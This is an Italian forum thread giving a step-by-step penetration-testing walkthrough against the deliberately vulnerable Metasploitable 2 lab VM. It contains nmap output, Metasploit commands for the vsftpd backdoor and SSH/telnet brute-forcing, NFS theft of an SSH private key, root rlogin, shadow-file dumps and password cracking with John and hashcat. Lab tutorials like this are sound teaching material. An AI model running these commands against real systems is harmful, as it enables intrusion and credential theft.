Roba da smanettoni - Cluster

Il Cluster è uno spazio dove vengono raggruppati argomenti, problematiche, soluzioni e gestione dell'Information Technology.
https://www.robadasmanettoni.it/forum/

Metasploitable 2 - Simulazione di un attacco

https://www.robadasmanettoni.it/forum/viewtopic.php?t=355

Pagina 1 di 2

Metasploitable 2 - Simulazione di un attacco

Inviato: 24/06/2024, 21:26
da FrancyDotNet
:sw_darth_vader: Prima di partire ci tenevo a fare non 1 ma ben 2 doverose premesse:
  1. Tutto il materiale riportato in questo articolo è scritto al solo scopo didattico/informativo.
  2. Non ci assumiamo alcuna responsabilità per qualsiasi danno, diretto o indiretto, di qualsiasi natura, derivante da o in qualsiasi modo collegato all'uso improprio di queste informazioni.
  3. In questa serie di articoli che faremo si darà per scontato che l'utente conosca almeno un minino le basi di come è fatta una rete.
  4. Ricordatevi sempre: da un grande potere derivano grandi responsabilità.

:arrow: Download di Metasploitable 2

Il modo più semplice ed efficace per ottenere un "computer vittima" è usare Metasploitable 2. Si tratta di una macchina virtuale Ubuntu Linux intenzionalmente vulnerabile progettata per testare le vulnerabilità più comuni. Tale macchina virtuale è compatibile con VMWare, VirtualBox e altre piattaforme di virtualizzazione comuni.
Per scaricare la macchina virtuale Metasploitable 2 visitate questa pagina: Una volta dentro seguite le istruzioni per il download.

:arrow: Download di Kali Linux

Il miglior modo per ottenere un "computer di attacco" è quello di utilizzare un sistema operativo rivolto all'hacking già predisposto per effettuare analisi e attacchi verso altri dispositivi. Questo sarà il nostro banco di lavoro.
Personalmente non credo esista il "miglior sistema operativo rivolto all'hacking" ma piuttosto sono dell'idea che il miglior sistema operativo rivolto all'hacking è quello che ognuno di noi si costruisce nel tempo con tanta pazienza ma soprattutto con la consapevolezza e competenza degli strumenti installati.
Oggi, in linea di massima, le distribuzioni maggiormente utilizzate per effettuare penetration testing sono: Kali Linux, Parrot OS, BackBox e Blackarch. Tutte ottime e specifiche per eseguire determinati test, non esiste una migliore di un'altra, tuttavia la più nota e utilizzata dal grande pubblico per effettuare pentesting è di sicuro Kali Linux perciò nei nostri test utilizzeremo questa per convenzione (poi ognuno può utilizzare liberamente quella che preferisce).
Per scaricare la LiveCD installabile di Kali Linux dalla pagina https://www.kali.org/downloads/ oppure è sempre possibile scaricare l'installer per Windows dal repository su GitHub

:arrow: Primo approccio e analisi del problema

Metasploitable 2 un ambiente sicuro per eseguire test di penetrazione e ricerche sulla sicurezza.
Per accedere alla console della macchina virtuale è possibile utilizzare queste credenziali
  • login: msfadmin
  • password: msfadmin
Il mio consiglio, almeno per il primo approccio, è quello di ottenere l'indirizzo ip accedendo direttamente alla VM di Metasploitable2 per agevolare il lavoro (nel caso che andremo ad analizzare ipotizziamo che l'indirizzo ip sia 192.168.1.100). Se invece volete andare alla ricerca dell'host in modo efficiente e veloce allora vi consiglio di eseguire il comando netdiscover -r 192.168.1.0/24 (che... per fare quello di cui abbiamo bisogno basta e avanza).
Una volta identificata l'host Met possiamo tranquillamente spostarci sul computer di attacco ed effettuare una scansione verso il nostro computer vittima: nmap -sS -sV -O 192.168.1.100

-sS = Effettua una scansione veloce e invisibile (SYN scan)

-sV = Scansiona le porte aperte per determinare le informazioni sul servizio / versione

-O = Riporta le informazioni sul sistema operativo


Effettuiamo una scansione un pò più aggressiva: nmap -p 1-65535 -T4 -A -v 192.168.1.100

-p 1-65535 = Scansiona le porte dalla n°1 alla n°65535.

-T4 = Indica il Timing templates di tipo 4.

-A = Scansione della versione e tipo del sistema, script scanning, and traceroute

-v = Mostra un maggior numero di informazioni ricevute durante la scansione.


Nel paragrafo successivo vedremo i risultati di quest'ultima scansione. La riporto anche per avere un confronto / riferimento per quelli che saranno i successivi test di attacco alla macchina vittima.

:arrow: Analisi scansione con Nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-24 14:10 CET
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:10
Completed NSE at 14:10, 0.00s elapsed
Initiating NSE at 14:10
Completed NSE at 14:10, 0.00s elapsed
Initiating NSE at 14:10
Completed NSE at 14:10, 0.00s elapsed
Initiating ARP Ping Scan at 14:10
Scanning 192.168.1.100 [1 port]
Completed ARP Ping Scan at 14:10, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:10
Completed Parallel DNS resolution of 1 host. at 14:10, 2.02s elapsed
Initiating SYN Stealth Scan at 14:10
Scanning 192.168.1.100 [65535 ports]
Discovered open port 25/tcp on 192.168.1.100
Discovered open port 445/tcp on 192.168.1.100
Discovered open port 53/tcp on 192.168.1.100
Discovered open port 80/tcp on 192.168.1.100
Discovered open port 5900/tcp on 192.168.1.100
Discovered open port 22/tcp on 192.168.1.100
Discovered open port 23/tcp on 192.168.1.100
Discovered open port 21/tcp on 192.168.1.100
Discovered open port 111/tcp on 192.168.1.100
Discovered open port 3306/tcp on 192.168.1.100
Discovered open port 139/tcp on 192.168.1.100
Discovered open port 8180/tcp on 192.168.1.100
Discovered open port 33914/tcp on 192.168.1.100
Discovered open port 3632/tcp on 192.168.1.100
Discovered open port 1099/tcp on 192.168.1.100
Discovered open port 42677/tcp on 192.168.1.100
Discovered open port 44471/tcp on 192.168.1.100
Discovered open port 512/tcp on 192.168.1.100
Discovered open port 6697/tcp on 192.168.1.100
Discovered open port 6000/tcp on 192.168.1.100
Discovered open port 5432/tcp on 192.168.1.100
Discovered open port 6667/tcp on 192.168.1.100
Discovered open port 514/tcp on 192.168.1.100
Discovered open port 2049/tcp on 192.168.1.100
Discovered open port 42806/tcp on 192.168.1.100
Discovered open port 513/tcp on 192.168.1.100
Discovered open port 1524/tcp on 192.168.1.100
Discovered open port 8787/tcp on 192.168.1.100
Discovered open port 2121/tcp on 192.168.1.100
Discovered open port 8009/tcp on 192.168.1.100
Completed SYN Stealth Scan at 14:10, 3.18s elapsed (65535 total ports)
Initiating Service scan at 14:10
Scanning 30 services on 192.168.1.100
Completed Service scan at 14:12, 126.13s elapsed (30 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.100
NSE: Script scanning 192.168.1.100.
Initiating NSE at 14:12
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 14:12, 10.35s elapsed
Initiating NSE at 14:12
Completed NSE at 14:13, 74.18s elapsed
Initiating NSE at 14:13
Completed NSE at 14:13, 0.00s elapsed
Nmap scan report for 192.168.1.100
Host is up (0.00025s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.80
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60-0f-cf-e1-c0-5f-6a-74-d6-90-24-fa-c4-d5-6c-cd (DSA)
|_ 2048 56-56-24-0f-21-1d-de-a7-2b-ae-61-b1-24-3d-e8-f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2019-10-24T13:12:33+00:00; -2s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 18
| Capabilities flags: 43564
| Some Capabilities: SwitchToSSLAfterHandshake, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, ConnectWithDatabase, Support41Auth, SupportsCompression
| Status: Autocommit
|_ Salt: &Foy7@}tQu|-iL}Ti7r[
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2019-10-24T13:12:33+00:00; -2s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 19:11:28
| source ident: nmap
| source host: E885AD4A.78DED367.FFFA6D49.IP
|_ error: Closing Link: cgauzlgku[192.168.1.80] (Quit: cgauzlgku)
6697/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 19:11:26
| source ident: nmap
| source host: E885AD4A.78DED367.FFFA6D49.IP
|_ error: Closing Link: psbyxsdki[192.168.1.80] (Quit: psbyxsdki)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
33914/tcp open status 1 (RPC #100024)
42677/tcp open java-rmi GNU Classpath grmiregistry
42806/tcp open nlockmgr 1-4 (RPC #100021)
44471/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:5A:97:02 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.797 days (since Mon Dec 23 19:05:42 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.1.100

NSE: Script Post-scanning.
Initiating NSE at 14:13
Completed NSE at 14:13, 0.00s elapsed
Initiating NSE at 14:13
Completed NSE at 14:13, 0.00s elapsed
Initiating NSE at 14:13
Completed NSE at 14:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 217.93 seconds
Raw packets sent: 65555 (2.885MB) | Rcvd: 65553 (2.623MB)

:arrow: Primo approccio a Metasploit

Verificare questo comando:

Codice: Seleziona tutto

systemctl start postgresql && msfdb init && msfconsole
Avviamo il programma Metasploit digitanto msfconsole (questo presume che il programma sia già stato installato e configurato) e cerchiamo se esiste un exploit digitando search più il nome del servizio che vogliamo attaccare.
Se ad esempio volessimo attaccare il servizio vsftpd in ascolto sulla porta 21 dovremo scrivere search vsftpd.

Re: Metasploitable 2 - Simulazione di un attacco

Inviato: 24/06/2024, 21:26
da FrancyDotNet
ATTACCARE IL SERVER FTP - vsFTPD
Come primo approccio pensavo ad una cosa abbastanza semplice come hackerare la nostra macchina virtuale Metasploitable tramite FTP.

Detto questo
Prima di tutto effettuiamo una scansione utilizzando nmap utilizzando questi parametri:

Codice: Seleziona tutto

nmap -sV 192.168.1.100
Dalle prime righe possiamo vedere che sulla porta 21 è in ascolto un servizio FTP e che il software in questione è vsFTPD 2.3.4. Ora, visto che tentar non nuoce, proviamo a cercare con Matasploit se esiste un exploit relativo a vsFTPD per violarne la sicurezza e accedere al computer remoto. Per effettuare la ricerca digitiamo

Codice: Seleziona tutto

search vsftp
Metasploit ci mostrerà che esiste un exploit a riguardo ed è denominato VSFTPD v2.3.4 Backdoor Command Execution. Con questo hack ci permetterà di sfruttare una backdoor inserita (volutamente) in questa versione di vsFTPD.

Codice: Seleziona tutto

use exploit/unix/ftp/vsftpd_234_backdoor
e successivamente inseriamo l'unica opziome che ci viene chiesta da questo exploit, ovvero l'indirizzo della vittima:

Codice: Seleziona tutto

set RHOSTS 192.168.1.100
a questo punto possiamo eseguire l'exploit digitando il comando:

Codice: Seleziona tutto

run
Successivamente ci verrà mostrato il messaggio "Command shell session 1 opened" ovvero che stata aperta una sessione con la quale poter interagire col computer vittima.

ATTACCARE IL SERVER FTP - ProFTPD
Un altro servizio FTP attivo su questa macchina virtuale è il ProFTPD in ascolto sull porta 2121. Se come al solito cercheremo l'exploit pubblico usando il comando search, come risultato vedremo diversi esploit correlati a ProFTPD, ma non esiste alcun exploit per la versione 1.3.1.

Eseguendo una banale ricerca su Google possiamo vedere esiste la vulnerabilità CVE-2009-0543 registrata presso il Common Vulnerabilities and Exposures (detto anche CVE). Un esempio pratico di come attuare l'exploit potete vederlo da qui ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection.

Per ora mi basta arrivare qua per chiarire un concetto: potete avere a vostra disposizione la miglior distribuzione votata all'hacking con tutti gli strumenti a corredo, ma per violare la sicurezza di un sistema non servono trucchetti da copia & incolla o una banale ricerca so Google ma occorrono competenze ed esperienza!

:mrgreen: Detto questo... potremmo optare per un attacco a dizionario utilizzando una velocità di attacco moderata, ma questo lo vediamo più avanti.

https://saiyanpentesting.com/metasploit ... tp-part-2/

Re: Metasploitable 2 - Simulazione di un attacco

Inviato: 24/06/2024, 21:26
da FrancyDotNet
ATTACCARE IL SERVER TELNET
Telnet è un programma obsoleto e di solito se ne sconsiglia l'utilizzo per motivi di sicurezza. Prima di partire diamo una rapida occhiata alla scansione che ci ha gentilmente riportato DK:
Dark Knight ha scritto: 24/10/2019, 9:31 ...
Discovered open port 23/tcp on 192.168.1.100
...
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
In questo caso possiamo vedere che il servizio Telnet è in ascolto sulla porta 23.
Al momento che questo servizio non ha un exploit pubblico o forse non è vulnerabile (questo non lo so), questo ci porta a trovare una soluzione diversa da quella dell'exploit come abbiamo visto in precedenza. Tuttavia possiamo sempre provare un altro modo, come ad esempio l'attacco a dizionario.
OK, ora apriamo la nostra console di Metasploit e digitiamo quanto segue:

Codice: Seleziona tutto

use auxiliary/scanner/telnet/telnet_login
L'attacco a dizionario prevede una lista di username / password con i quali poter provare ad accedere.
Se utiliziamo la distribuzione Kali nella cartella /usr/share/wordlists/ possiamo trovare dei dizionari già pronti all'uso.
Ora impostiamo i parametri corretti:

Codice: Seleziona tutto

set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
set RHOSTS 192.168.1.100
set VERBOSE false
quindi eseguiamo l'exploit:

Codice: Seleziona tutto

run

Re: Metasploitable 2 - Simulazione di un attacco

Inviato: 24/06/2024, 21:27
da FrancyDotNet
ATTACCARE IL SERVER SMTP
Apriamo il Metasploit Framework ed eseguiamo una scansione db_nmap -p 25 -T4 -A 192.168.1.100 oppure possiamo prendere in prestito quanto già riportato da DK:
Dark Knight ha scritto: 24/10/2019, 9:31 ...
Discovered open port 25/tcp on 192.168.1.100
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
Poi scriviamo:

Codice: Seleziona tutto

use auxiliary/scanner/smtp/smtp_enum

Codice: Seleziona tutto

set RHOSTS 192.168.1.100

Codice: Seleziona tutto

set THREADS 8
THREADS è il numero di thread / processi sulla tua CPU. Qui c'è un problema: le macchine Windows devono avere thread molto più bassi rispetto a Unix. Il numero massimo di thread per Windows è 16, mentre per Unix è 128.

Per sicurezza e non arrestare in modo anomalo i computer Windows, utilizzare 1, 5 o 10 thread, a seconda dell'età del laptop o del computer Windows. Usa il comando "set" per dire a Metasploit quanti thread avviare all'indirizzo IP delle vittime.
Non consiglio di impostare THREADS sopra 10, poiché Windows è soggetto a crash. Se vuoi essere uno scanner nascosto, non è buona norma arrestare in modo anomalo la macchina, dato che è un po' un omaggio.

Codice: Seleziona tutto

run

Re: Metasploitable 2 - Simulazione di un attacco

Inviato: 24/06/2024, 21:28
da FrancyDotNet
ATTACCARE IL SERVER VNC
Exploiting VNC in Metasploitable box




Metasploit VNC inject:

Hack Desktop Victim with VNCINJECT in Metasploit:

Re: Metasploitable 2 - Simulazione di un attacco

Inviato: 24/06/2024, 21:29
da FrancyDotNet
ATTACCARE IL SERVER SSH
Dark Knight ha scritto: 24/10/2019, 9:31 ...
Discovered open port 22/tcp on 192.168.1.100
...
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60-0f-cf-e1-c0-5f-6a-74-d6-90-24-fa-c4-d5-6c-cd (DSA)
|_ 2048 56-56-24-0f-21-1d-de-a7-2b-ae-61-b1-24-3d-e8-f3 (RSA)

:arrow: Utilizzo del metodo ssh_login

Codice: Seleziona tutto

use auxiliary/scanner/ssh/ssh_login
L'attacco a dizionario prevede una lista di username / password con i quali poter provare ad accedere.
Se utiliziamo la distribuzione Kali nella cartella /usr/share/wordlists/ possiamo trovare dei dizionari già pronti all'uso.
Ora impostiamo i parametri corretti:

Codice: Seleziona tutto

set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
set RHOSTS 192.168.1.100
set VERBOSE false
quindi eseguiamo l'exploit:

Codice: Seleziona tutto

run
Successivamente ci verrà mostrato il messaggio "Command shell session 1 opened" ovvero che stata aperta una sessione con la quale poter interagire col computer vittima.

:arrow: Utilizzo del metodo ssh_login

Codice: Seleziona tutto

service rpcbind start
mkdir /tmp/target
mount -t nfs 192.168.1.100:/ /tmp/target
cp /tmp/target/home/msfadmin/.ssh/id_rsa /tmp/sshprivatekey
umount /tmp/target

Codice: Seleziona tutto

use auxiliary/scanner/ssh/ssh_login_pubkey

Codice: Seleziona tutto

set KEY_PATH /tmp/sshprivatekey
set USERNAME root
set RHOSTS 192.168.1.100
infine eseguiamo l'exploit:

Codice: Seleziona tutto

run
Una volta terminato il processo di login ci verrà comunicato che è stata aperta una sessione. Per effettuare un testa sulla buona riuscita dell'operazione digitiamo il comando sessions -i e una volta individuata la sessione

:arrow: Questo post prende spunto dall'articolo: Scanner SSH Auxiliary Modules e da Metasploitable/SSH/Exploits

Re: Metasploitable 2 - Simulazione di un attacco

Inviato: 24/06/2024, 21:30
da FrancyDotNet
ATTACCARE I SERVIZI RLOGIN :alien_14: Un altro exploit easy-easy è quello presente sulle porte TCP 512, 513 e 514 (conosciute come servizi "R"). A noi interessa in modo particolare quello sulla porta 513 relativo al servizio di login.
Dark Knight ha scritto: 24/10/2019, 9:31 ...
Discovered open port 513/tcp on 192.168.1.100
...
513/tcp open login OpenBSD or Solaris rlogind
L'exploit è possibile trovarlo qui: https://community.rapid7.com/docs/DOC-1875. In pratica basta eseguire il comando:

Codice: Seleziona tutto

rlogin -l root 192.168.1.100
:nice: Il gioco è fatto... o quasi. :idea: Da tener ben presente questo exploit per funzionare necessita del pacchetto "rsh-client" installato sul vostro terminale.

:pirate2: In alternativa è possibile utilizzare PuTTY configurandolo come segue:
  • Host name: 192.168.1.100
  • Port: 513
  • Connection type: Rlogin
Quando viene richiesto l'utente di login inseriamo root ed il gioco è fatto!


:alien_16: Una volta dentro con i privilegi di root cosa potremmo mai fare? :twisted: Mwhaha... beh, prima di tutto, vista la ghiotta occasione, direi che ci possiamo portare a casa l'elenco degli utenti e delle password. :roll: Ovviamente le password non sono scritte in chiaro, ma questo fa parte del divertimento.

Quindi per prima cosa visualizziamo l'elenco degli utenti col comando cat /etc/passwd, copiamo le informazioni dal nostro terminale e le salviamo in un file di testo (ad esempio passwd.txt):

Codice: Seleziona tutto

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
Successivamente visualizziamo l'elenco delle password col comando cat /etc/shadow], copiamo le informazioni dal nostro terminale e le salviamo in un file di testo (ad esempio shadow.txt).

Codice: Seleziona tutto

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$z67WIsfX$DtybVu6oFgUAhcba6AeuT/:18255:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
Per decifrare le password useremo il software John the Ripper, tuttavia prima di partire abbiamo bisogno di unire queste informazioni col programma unshadow tramite questo comando:

Codice: Seleziona tutto

unshadow passwd.txt shadow.txt > password.txt
A questo punto è possibile eseguire John per craccare le password contenute nel file

Codice: Seleziona tutto

john --wordlist=/usr/share/wordlists/rockyou.txt xpassword.txt
Inoltre suggerisco il dizionario /usr/share/sqlmap/data/txt/wordlist.txt il quale contiene ulteriori password.

Un altro sistema per... Hashcat. In questo caso dobbiamo copiare tutti gli hash da decifrare in un file di testo che chiameremo hashes.txt.

Codice: Seleziona tutto

$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.
$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0
$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0
$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/
$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/
$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0
$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//

Codice: Seleziona tutto

hashcat -m 500 -a 0 -o cracked.txt hashes.txt /usr/share/sqlmap/data/txt/wordlist.txt -O

Codice: Seleziona tutto

hashcat -m 500 -a 3 test.hash ?l?l?l?l --force
https://null-byte.wonderhowto.com/how-t ... m-0186386/
https://christeninformatica.ch/guida-it ... ema-linux/

Re: Metasploitable 2 - Simulazione di un attacco

Inviato: 24/06/2024, 21:30
da FrancyDotNet
ATTACCARE IL SERVER CON PRIVILEGE ESCALATION
:mrgreen: Hack Metasploitable 2 Including Privilege Escalation

Re: Metasploitable 2 - Simulazione di un attacco

Inviato: 24/06/2024, 21:30
da FrancyDotNet
ATTACCARE IL SERVER IRC - UnrealIRC [...]



:arrow: Questo post prende spunto dall'articolo: Hacking Unreal IRCd 3.2.8.1 on Metasploitable 2

Re: Metasploitable 2 - Simulazione di un attacco

Inviato: 24/06/2024, 21:31
da FrancyDotNet
Hacking MySQL in metasploitable2 with Metasploit:
Tutti gli orari sono UTC
Pagina 1 di 2

Creato da phpBB® Forum Software © phpBB Limited

Traduzione Italiana phpBB-Italia.it